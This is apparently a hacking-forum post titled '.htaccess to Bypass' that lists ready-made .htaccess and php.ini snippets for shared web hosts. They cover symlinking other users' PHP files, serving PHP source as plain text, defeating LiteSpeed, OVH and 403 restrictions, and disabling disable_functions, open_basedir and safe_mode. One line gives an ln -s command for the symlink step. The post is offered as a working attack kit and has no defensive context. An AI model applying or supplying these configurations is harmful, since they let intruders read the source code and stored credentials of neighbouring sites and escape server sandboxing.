.htaccess to Bypass (1 Viewer)

Joined
Aug 15, 2016
Credits
19
Rating - 0%
---------------------------------------------------------------------------
- [ Bypass Directory ]-
---------------------------------------------------------------------------
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
---------------------------------------------------------------------------

---------------------------------------------------------------------------
- [ Include symlink ]-
---------------------------------------------------------------------------
Options Indexes FollowSymLinks
DirectoryIndex azzatssins.htm
AddType txt .php
AddHandler txt .php
---------------------------------------------------------------------------

---------------------------------------------------------------------------
- [ Bypass Litespeed ] -
Lakukan Symlink Dulu ==> ln -s /home/user/public_html/file.php file.shtml
---------------------------------------------------------------------------
.htaccess
Options +FollowSymLinks
DirectoryIndex azzatssins.html
RemoveHandler .php
AddType application/octet-stream .php
---------------------------------------------------------------------------

---------------------------------------------------------------------------
- [ Bypass OVH ]-
---------------------------------------------------------------------------
.htaccess
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
---------------------------------------------------------------------------

---------------------------------------------------------------------------
- [ Bypass Symlink 403 forbidden ] -
---------------------------------------------------------------------------
.htaccess
Options all
DirectoryIndex azzatssins.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
---------------------------------------------------------------------------

---------------------------------------------------------------------------
- [ BYPASS FUNCTIONS / PHP.INI ]-
---------------------------------------------------------------------------
safe_mode = Off
disable_functions = NONE
safe_mode_gid = Off
open_basedir = Off
register_globals = on
---------------------------------------------------------------------------
 

Users who are viewing this thread

Top